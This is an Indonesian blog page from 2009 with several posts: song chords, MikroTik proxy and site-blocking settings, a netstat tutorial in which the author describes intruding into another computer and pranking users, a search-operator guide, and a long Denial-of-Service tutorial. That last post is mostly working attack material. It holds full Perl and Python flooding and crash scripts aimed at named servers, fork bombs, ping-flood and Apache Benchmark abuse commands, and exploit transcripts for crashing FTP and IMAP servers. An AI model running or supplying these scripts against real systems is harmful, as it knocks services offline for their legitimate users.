Selasa, 30 Juni 2009

Kord + Lirik ( Roulette - Aku Jatuh Cinta )

Roulette - Aku Jatuh Cinta

E B
Awalnya ku tak mengerti apa yang sedang kurasakan

C#m G#m
Segalanya berubah dan rasa rindu itu pun ada

A G#m
Sejak kau hadir di setiap malam dan tidurku

F#m B
Aku tau sesuatu sedang terjadi padaku


E G#m
Sudah sekian lama kualami pedih putus cinta

C#m G#m
Dan mulai terbiasa hidup sendiri tanpa asmara

A G#m
Dan hadirmu membawa cinta sembuhkan lukaku

F#m B
Kau berbeda dari yang kukira


Reff:

E F#m
Aku jatuh cinta kepada dirinya

B E
Sunguh sungguh cinta oh apa adanya

C#m F#m
Tak pernah kuragu namun tetap slalu menunggu

A Am
Sungguh aku jatuh cinta kepadanya


E B
Coba coba dengarkan apa yang ingin aku katakan

C#m G#m
Yang slama ini sungguh telah lama terpendam

A G#m
Aku tak percaya membuatku tak berdaya

F#m B
Tuk ungkapkan apa yang kurasa


Reff:

E F#m
Aku jatuh cinta kepada dirinya

B E
Sunguh sungguh cinta oh apa adanya

C#m F#m
Tak pernah kuragu namun tetap slalu menunggu

A Am
Sungguh aku jatuh cinta kepadanya



F#m G#m
Kadang aku cemburu, kadang aku gelisah

A C#m
Seringnya ku tak tentu lalui hariku

F#m G#m
Tak dapat kupungkiri hatiku yang terdalam

A C D
Betapa aku jatuh cinta kepadanya

Sabtu, 27 Juni 2009

Blok Mikrotik

Blok Mac Adreess
iptables -I PREROUTING -t nat -j DROP -m mac --mac-source AA:BB:CC:DD:EE:FF -p tcp --dport 80
iptables -I PREROUTING -t nat -j DROP -m mac --mac-source AA:BB:CC:DD:EE:FF

First, Configure Proxy
/ip proxy
enabled: yes
src-address: 0.0.0.0
port: 8080
parent-proxy: 0.0.0.0:0
cache-drive: system
cache-administrator: "Adhie IT"
max-disk-cache-size: none
max-ram-cache-size: none
cache-only-on-disk: no
maximal-client-connections: 1000
maximal-server-connections: 1000
max-object-size: 512KiB
max-fresh-time: 3d

Now, Make it Transparent
/ip firewall nat
chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=8080
Make sure that your proxy is NOT a Open Proxy
/ip firewall filter
chain=input in-interface= src-address=0.0.0.0/0 protocol=tcp dst-port=8080 action=drop
Now for Blocking Websites
/ip proxy access
dst-host=www.vansol27.com action=deny

It will block website http://www.vansol27.com, We can always block the same for different networks by giving src-address. It will block for particular source address.
We can also stop downloading files like.mp3, .exe, .dat, .avi,…etc.
/ip proxy access
path=*.exe action=deny
path=*.mp3 action=deny
path=*.zip action=deny
path=*.rar action=deny.
Try with this also
/ip proxy access
dst-host=:mail action=deny

Mendeteksi Penyusup Jaringan Lewat DOS

Mungkin kita tidak sadar kalau kita main diwarnet bahwa ternyata ada yang sedang memantau kita baik itu adminya atau memang orang iseng yang mau mencuri informasi dari kita, maka dengan itu saya akan sedikit mencoba melihat atau mendetiksinya hanya denga dos command!

Ternyata di Dos ada fasiltas yang mungkin kita semua lupakan dan jarang digunakan perintah itu adalah NETSTAT. Windows menyediakan perintah ini untuk mendukung jaringan. Netstat juga bisa digunakan untuk melihat ip-ip yang sedang terhubung ke komputer kita.

Untuk itu buka dos command kamu , tau kan caranya :d kalau ga tau nich :
- Start>Run>command.exe [utk win 95/98]
- Start>Run>cmd.exe [utk win 2000/xp /nt]
lalu mucul deh command prompt

C:\winnt>netstat ?

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the
-s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. interval dedisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.

Sekarang kita gunakan netstat untuk melihat koneksi yang sedang terhubung gunakan -a

C:\winnt>netstat -a
Proto Local Address Foreign Address State
TCP me:http me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:https me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:microsoft-ds me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1025 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1027 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1028 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1146 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1163 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1253 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1261 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1288 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1306 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1314 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:5101 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap 10.22.1.236:4504 TIME_WAIT
TCP me:netbios-ssn me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 LAJKTTS02:1080 ESTABLISHED
TCP me:1288 IS~HRS:microsoft-ds ESTABLISHED
TCP me:1306 GREENGUY:microsoft-ds ESTABLISHED
UDP me:1134 *.*

sebelah nama pc itu adalah port yang digunakan untuk hubungan. netstat diatas saya mengunakan komputer kantor yang mengunakan ip dhcp. Disini kita bisa melihat siapa-siapa aja yang terhubung dalam komputer kita atau dengan contoh yang lebih jelas ini .
Untuk lebih jelasnya aku akan coba menyusup ke komputer orang lain dengan mengunakan kaht2 :D dan aku udah dapat menyusup.

C:\WINDOWS\System32>netstat -a
Active Connections

Proto Local Address Foreign Address State
TCP khs_2003:epmap khs_2003:0 LISTENING
TCP khs_2003:microsoft-ds khs_2003:0 LISTENING
TCP khs_2003:1025 khs_2003:0 LISTENING
TCP khs_2003:1063 khs_2003:0 LISTENING
TCP khs_2003:1093 khs_2003:0 LISTENING
TCP khs_2003:1136 khs_2003:0 LISTENING
TCP khs_2003:1138 khs_2003:0 LISTENING
TCP khs_2003:5000 khs_2003:0 LISTENING
TCP khs_2003:43715 khs_2003:0 LISTENING
TCP khs_2003:epmap 10.21.3.17:3628 TIME_WAIT <------1
TCP khs_2003:epmap 10.21.3.50:1686 FIN_WAIT_2 <------2
TCP khs_2003:netbios-ssn khs_2003:0 LISTENING
TCP khs_2003:1093 10.21.1.18:8080 CLOSE_WAIT
TCP khs_2003:1136 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:1138 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:11196 khs_2003:0 LISTENING
TCP khs_2003:43715 10.21.3.50:1687 ESTABLISHED <------3
UDP khs_2003:microsoft-ds *:*
UDP khs_2003:isakmp *:*
UDP khs_2003:1028 *:*
UDP khs_2003:1035 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:netbios-ns *:*
UDP khs_2003:netbios-dgm *:*
UDP khs_2003:1900 *:*
UDP khs_2003:13715 *:*
UDP khs_2003:61804 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:1032 *:*
UDP khs_2003:1036 *:*
UDP khs_2003:1107 *:*
UDP khs_2003:1134 *:*
UDP khs_2003:1900 *:*

Komputer ini sedang di susupi oleh aku coba lihat port nya.pada angka 3 ada port yang dibuka kaht2 untuk mengeksploit suatu komputer. lalu bagaimana kita cara kita untuk mengetahui nama komputer yang sedang menyusup ke komputer kita . Gunakan nbtstat -a

C:\WINDOWS\System32>nbtstat -a [ip]
C:\WINDOWS\Syetem32>nbtstat -a 10.21.3.50

Jantung:
Node IpAddress: [10.21.3.50] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ME <00> UNIQUE Registered
ME <20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
ME <03> UNIQUE Registered
INet~Services <1C> GROUP Registered
IS~ME..........<00> UNIQUE Registered
MAC Address = 00-60-08-29-37-48

Coba lihat ternyata ip 10.21.3.50 nama pc nya adalah me dan dia join ke workgroup. Kita bisa buat kaget orang yang mengintip kita itu gunakan netsend fasiltas yang hanya ada pada win 2000/xp atau nt .

C:\winnt>net send [ip/nama pc] [pesan]

Sebetulnya masih ada lagi fasilitas2 dos yang bisa digunakan untuk iseng :D jadi tambah ngerti dan asyik bukan main-main di DOS command, apalagi kalau main di warnet :d, ya udah segitu aja tricknya semoga bermaanfaat.

Status State
++ ESTABLISHED berarti komputer terhubung ke Foreign .
++ LISTENING koneksi komputer dalam keadaan standby .
++ TIME_WAIT komputer sedang menunggu suatu koneksi .
++ CLOSE_WAIT
++ FIND_WAIT

*ezine

Jumat, 26 Juni 2009

Tekhnik Pencarian Informasi di Internet Menggunakan Search Engine

Mungkin seluruh atau sebagian dari kita selalu tergantung dengan search engine
untuk mendapatkan informasi, berita, software gratis dan lain sebagainya. Tapi
masih sangat sedikit yang mengerti searching yang baik. Ok kita mulai saja,
bahwa dalam searching kita mengenal beberapa search engine salah satunya Google.
Beberapa search engine mengenal karakter seperti +, - dan ". Tetapi masih banyak
yang belum tahu mengenai karakter tersebut. Saya akan menggunakan mode Tanya
jawab dalam menjelaskan hal tersebut.



Karakter Matematika.

# Tanda (+)

Ingin mencari artikel yang didalamnya terkandung kata hacking,security dan internet.

Anda dapat mengetikkan kata disearch engine : +hacking +security +internet Jika
terdapat artikel yang memuat salah satu atau dua kata tersebut diatas tidak akan
ditampilkan hanya artikel yang memuat tiga kata tersebut yang di tampilkan .
Tanda + dibaca oleh search engine sebagai DAN symbol ini dapat dipakai
sebanyak-banyaknya misalnya: +harga +komputer murah +untuk +wilayah +medan.
Dan sebagai nya.



# Tanda (-)

Ingin mencari artikel yang didalamnya terkiandung kata statistic penduduk sumatera
kecuali Medan.Ketik di search engine : +statistic +penduduk +sumatera -Medan. Search
engine yang bersangkutan akan mencari di internet artikel yan mengandung kata Statistik
penduduk sumatera tetapi tidak terdapat kata medan. Atau seperti ini +tempat +wisata
+bali -kuta. Maka search engine akan menampilkan artikel tentang tempat wisata di bali
dan pada artikel tersebut tidak terdapat kata kuta. Tanda - dibaca oleh search engine
sebagai KECUALI.



# Tanda (")

Ingin mencari artikel di internet yang didalamnya terdapat kata hacking dan security dan
kata tersebut tidak duipisah kan oleh kata-kata yang lain.

Ketik di search engine : "hacking dan security" maka search engine yang bersangkuta akan
mencari kata hacking dan security yang katanya tidak dipisah kan oleh kata-kata lain.
Apabila ada artikel yang mengandung kata hacking dan security yang katanya dipisah kan
oleh kata-kata lain maka artikel tersebut tidak ditampilkan oleh search engine yang
bersangkutan.



Dan anda dapat juga menggabungkan ketiga karakter tersebut tersebut seperti contoh
berikut ini: +kuliah +"ilmu komputer" -bayar

Search engine akan mencari artikel di internet yang terdapat kata kuliah ilmu komputer
kata ilmu komputer tidak akan dipisah kan oleh kata lain dan tidak akan menampilkan
artikel tersebut bila terdapat kata bayar. Perlu di ingat bahwa penggunaan spasi untuk
memisah kan antara kata-kata yang kita cari, spasi tersebut akaan dibaca ATAU contoh
Ketik di search engine : ilmu komputer

Maka search engine akan menampilkan web yang mengandung kata ilmu atau komputer atau
yang mengandung kata kedua-dua nya.



Simbol Bolean

Seperti yang kita ketahui symbol bolean adalah kata-kata OR, AND dan NOT. Kita dapat
menggunakan symbol tersebut dalam mencari informasi di internet.

# Bolean OR

Pada dasar nya symbol bolean OR sama seperti apabila kita menggunakan spasi contoh :
ilmu OR komputer

Search engine akan menampilkan web yang mengandung kata ilmu atau kata komputer atau
kedua-duanya.

# Bolean AND

Penggunaan bolean AND sama dengan karakter/tanda + Contioh : ilmu AND komputer

Search engine akan menampilkan web yang mengandung kata ilmu komputer apabila tidak
terdapat salah satu dari kata tersebut tidak akan di tampilkan.

# Bolean NOT

Penggunaan bolean NOT sama dengan tanda (- ) contoh saya akan mencari infor- masi tentang
statistic penduduk di sumater tetapi tidak termasuk medan.

Ketik di sdearch engine : Statistik AND penduduk AND sumater NOT medan search engine akan
menampilkan web yang berisi kata statistic penduduk sumatera tetapi tidak terdapat
kata medan.

# Bolean NEAR

Contoh : saya ingin mencari kata ilmu komputyeryang jarak antara kata tersebut berdekatan.

Ketik di search engine : ilmu NEAR komputer maka search engine akan menampilkan web yang
berisi kata ilmu komputer yang jarak antara kedua kata tersebut berdekatan.

Penggunaan Bolean tersebut diatas dapat juga digabungkan contoh Saya ingin mencari definisi
dari kata cinta atau kasih maka dapat di ketik di search engine : definisi AND (cinta OR kasih)
Search engine akan menampilkan web yang mengandung kata defini cinta atau definisi kasih.
Untuk contoh selanjut nya anda coba sendiri.



Penggunaan Host.
Pencarian informasi dapat juga dengan menggunakan kata Host, Contoh:
# Saya ingin mencari website ilmu komputer.com maka saya dapat mengetikkan di search engine
host: ilmukomputer.com
# Saya ingin mencari kata php di website ilmukomputer.com maka saya dapat mengetikkan
kata : php host: ilmukomputer.comatau host: ilmukomputer.com php.
# Saya ingin mencari kata pertahanan di situs-situs pemerintahan indonesiamaka saya dapat
mengitikkan di search engine: pertahanan host: go.id.

Symbol/karakter matematika dapat juga digabungkan dalam pencarian ini contoh:

Saya akan mencari kata pesawat tetapi bukan yang terdapat didalam website menristek.go.id
maka saya dapat mengetikkan di search engine : pesawat -host: menristek.go.id.

# Mencari informasi berdasarkan type file
Ada sebagian orang mencari informasi berdasrkan type file.
Contoh:

Saya ingin mencari artikel tentang hacking dan security dan artilkel tersebut harus dalam
format pdf. Dan saya dapat mengetikkan di search engine :
+hacking +security filetype: pdf

dan search engine akan menampilkan artikel tentang hacking dan security dengan format pdf

contoh lain :
saya ingin mencari artikel tentang ilmu komputer didalam website yang sufiksnya ac.id
artikel tersebut harus file bertype pdf maka saya dapat mengetikkan di search engine

+ilmu +komputer filetype:pdf host ac.id

# Mencari informasi berdasarkan judul situs

Kita juga dapat mencari situs web berdasarkan judulnya .

Contoh :

Ketik di search engine title:komputer

Maka search engine akan menampilkan situs yang mengandung judul komputer. sedangkan pada
search engine yahoo tidak mengenal kata TITLE tetapi hanya disingkat T.

# Mencari informasi berdasarkan URL

Pencarian dengan cara ini akan menampilkan URL yang diminta

Contoh :

inurl:komputer

Maka semua search akan menampilkan semua URL yang ada kata komputernya seperti

www.ilmukomputer.com/komputer dsb.

Contoh lainnya :

Php inurl:ilmukomputer.com maka search engine akan menampilkan seluruh artikel yang
mengandung kata php pada subdomain ilmu komputer.Dan pada google juga mengenal kata
allinurl tetapi pencarian ini hanya terbatas pada subdirectory, Sedangkan sampai ke
level file atau dengan kata lain inurl lebih dalam pencariannya tidah hanya terbatas
pada subdirectory.Dan yang perlu di ingat Tidak semua search engine mengenal
karakter matematika dan Bolean.

*ezine

Serangan Denial Of Service

.o0 Kata Pengantar

Pada dasarnya saya mencoba memberikan gambaran umum tentang Denial of
Service atau yang lebih kita kenal dengan DoS. Beberapa pertanyaan
yang mungkin bisa terjawab diantaranya :

1. Apa itu DoS ?
2. Apa motif cracker untuk melakukan itu ?
3. Bagaimana cara melakukannya ?
4. Apa yang harus saya lakukan untuk mencegahnya ?

Semuanya untuk anda, ENJOY !!.

.o0 Apa itu Denial of Service (DoS) ?

Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis)
atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat
menggunakan layanan tersebut. Dampak akhir dari aktifitas ini menjurus
kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal
(dalam kasus tertentu). Pada dasarnya Denial of Service merupakan serangan
yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana
admin akan berada pada kondisi yang membingungkan antara layanan dan
kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding
terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti
hukum ini.

Beberapa aktifitas DoS adalah:

1. Aktifitas 'flooding' terhadap suatu server.
2. Memutuskan koneksi antara 2 mesin.
3. Mencegah korban untuk dapat menggunakan layanan.
4. Merusak sistem agar korban tidak dapat menggunakan layanan.


.o0 Motif penyerang melakukan Denial of Service

Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker
dalam melakukan Denial of Service yaitu:

1. Status Sub-Kultural.
2. Untuk mendapatkan akses.
3. Balas dendam.
4. Alasan politik.
5. Alasan ekonomi.
6. Tujuan kejahatan/keisengan.

Status subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih
tepat kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum
dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan Denial of
Service merupakan aktifitas hacker diawal karirnya. Alasan politik dan
ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita
bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan
secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of
Service'. Beberapa kasus serangan virus semacam 'code-red' melakukan serangan
DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi,
komputer ini disebut 'zombie' dalam jargon.Lebih relevan lagi, keisengan
merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk
mendapatkan program-program DoS, seperti nestea, teardrop, land, boink,
jolt dan vadim. Program-program DoS dapat melakukan serangan Denial of
Service dengan sangat tepat, dan yang terpenting sangat mudah untuk
melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell
yang berupa ./nama_program argv argc ...


.o0 Denial of Sevice, serangan yang menghabiskan resource.

Pada dasarnya, untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource
yang besar, sehingga komputer/mesin yang diserang kehabisan resource dan
manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:

A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD

A. Swap Space

Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan
client. Spasi swap juga digunakan untuk mem-'forked' child process. Bagaimanapun
spasi swap selalu berubah dan digunakan dengan sangat berat. Beberapa serangan
Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

B. Bandwidth

Beberapa serangan Denial of Service menghabiskan bandwidth.

C. Kernel Tables

Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi
memori kepada kernel juga merupakan target serangan yang sensitif. Kernel
memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak
bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

D. RAM

Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak
mau harus di re-boot.

E. Disk

Serangan klasik banyak dilakukan dengan memenuhi Disk.

F. Caches

G. INETD

Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan
bekerja.


.o0 Teknik Melakukan Denial of Service

Melakukan DoS sebenarnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan
dampak buruk terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya
adalah menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga
tidak begitu menarik.
Kita akan bahas tipe-tipe serangan DoS.

1. SYN-Flooding
SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole'
pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang
lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of
Service dengan mencegahmenolak cracker untuk mengakses sistem.
2. Pentium 'FOOF' Bug
Merupakan serangan Denial of Service terhadap prosessor Pentium yang
menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis
sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor
yang digunakan yaitu pentium.
3. Ping Flooding
Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan
dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka
mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network).
Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP.
Varian dari serangan ini disebut "smurfing"
(http://www.quadrunner.com/~chuegen/smurf.txt).

Serangan menggunakan exploits.

Beberapa hal yang harus dipahami sebelum melakukan serangan ini adalah:
A. Serangan membutuhkan Shell Linux (Unix/Comp)
B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan
fungsi search agar lebih mudah)
C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

1. KOD (Kiss of Death)
Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms.
Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah
membuat hang/blue screen of death pada komputer korban.
Cara penggunaan:
A. Dapatkan file kod.c
B. Compile dengan Gcc: $ gcc -o kod kod.c
C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]
Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung
kepada jenis sistem operasi dan konfigurasi server target (misalmya:
blocking)
2. BONK/BOINK
Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari
bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT
3. Jolt
Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt
yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet
yang tinggi sekali kepada korban.
4. NesTea
Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows
versi awal. Versi improve dari NesTea dikenal dengan NesTea2
5. NewTear
Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk
(bonk.c)
6. Syndrop
Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target
serangan adalah Linux dan Windows
7. TearDrop
TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung
ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug
yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini
adalah Blue Screen of Death

Serangan langsung (+ 31337)

1. Ping Flood
Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya
sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran.
bash # ping -fs 65000 [ip_target]
2. Apache Benchmark
Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan)
suatu web server, namun tidak tertutup kemungkinan untuk melakukan
penyalahgunaan.
bash $ /usr/sbin/ab -n 10000 -c 300 \
http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum
(diketik dalam 1 baris!)
Akan melakukan 10000 request paralel 300 kepada host korban.com
3. Menggantung Socket
Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal
oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak
koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients.
Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1
request simultan dengan koneksi terpisah-pisah.

Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan
menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit).
Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa
batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache
akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan,
seolah-olah server korban tewas.

Script gs.pl (gantung socket)

#!/usr/bin/perl
#
# Nama Script : gs.pl
# Tipe : Denial of Service (DoS)
# Auth : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print "Gunakan: perl gs.pl [host] [port] \n";
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto => "tcp"
or die; print "$_\n"
}
# END. 27 Oktober 2003
# Lakukan dari beberapa LoginShell (komputer) !

DoS-ing Apache lagi !!

Beberapa contoh skrip perl untuk melakukan DoS-ing secara local.

1. Fork Bomb, habiskan RAM

#!/usr/bin/perl
fork while 1;

2. Habiskan CPU

#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i

3. Habiskan Memory

#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = "X" x 0xff; }

4. Serangan Input Flooding
Saya mengamati serangan ini dari beberapa advisories di BugTraq. Remote
Buffer Overflow yang menghasilkan segmentation fault (seg_fault) dapat
terjadi secara remote jika demon (server) tidak melakukan verifikasi input
sehingga input membanjiri buffer dan menyebabkan program dihentikan secara
paksa.

Beberapa 'proof of concept' dapat dipelajari melalui beberapa contoh ini.

1. Serangan kepada IISPop EMAIL Server.
Sofie : Email server
Vendor : http://www.curtiscomp.com/
TIPE : Remote DoS

IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes,
versi yang vuneral dan telah di coba adalah V: 1.161 dan 1.181

Script: iispdos.pl

#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;
}
# Data 289999 bytes
$buff = "A" x 289999;

print "Connecting ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "110",
Proto=> "tcp") or die;
print "Error: $_\n";
print "Connect !!\n";
print $connect "$buff\n";
close $connect;
print "Done \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "110",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# END.

2. Membunuh wzdftpd.
Sofie : wzdftpd
Vendor : http://www.wzdftpd.net

Proof of Concept:

% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host

wzdftpd crash setelah diberikan perintah/command PORT !

3. Serangan 32700 karakter, DoS BRS WebWeaver.
Sofie : BRS WebWeaver V. 1.04
Vendor : www.brswebweaver.com
BugTraqer : euronymous /F0KP

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{

Serangan diatas mengirimkan 32700 karakter yang menyebabkan server crash !

4. Buffer Overflow pada MailMAX 5
Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)
Vendor : http://www.smartmax.com
BugTraqer : matrix at 0x36.org

Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command
SELECT. Dampak dari serangan ini adalah berhentiya server dan harus di-restart secara
manual.

Contoh eksploitasi:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------

Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool
ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat'


Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu - tentu saja -
membanjiri input dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada
komputer esekutor yang memiliki bandwidth lebar.

Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.

Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS.
Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (
port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim).

-- udos.pl --

#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
#
if (!$ARGV[2]) {
print "Gunakan % perl udos.pl [host] [port] [data] \n";
print "Contoh :\n";
print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
exit;
}
# Siapkan data
$buffer = "A" x $ARGV[2];
# Connect -> Korban
print "Connecting ... -> $ARGV[0] \n";
$con = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto=> "tcp") or die;
print "Error: $_ \n";
# Connect !
print "Connect !! \n";
print $con "$buffer\n";
close $con;
print "Done. \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# End.

-- udos.pl --

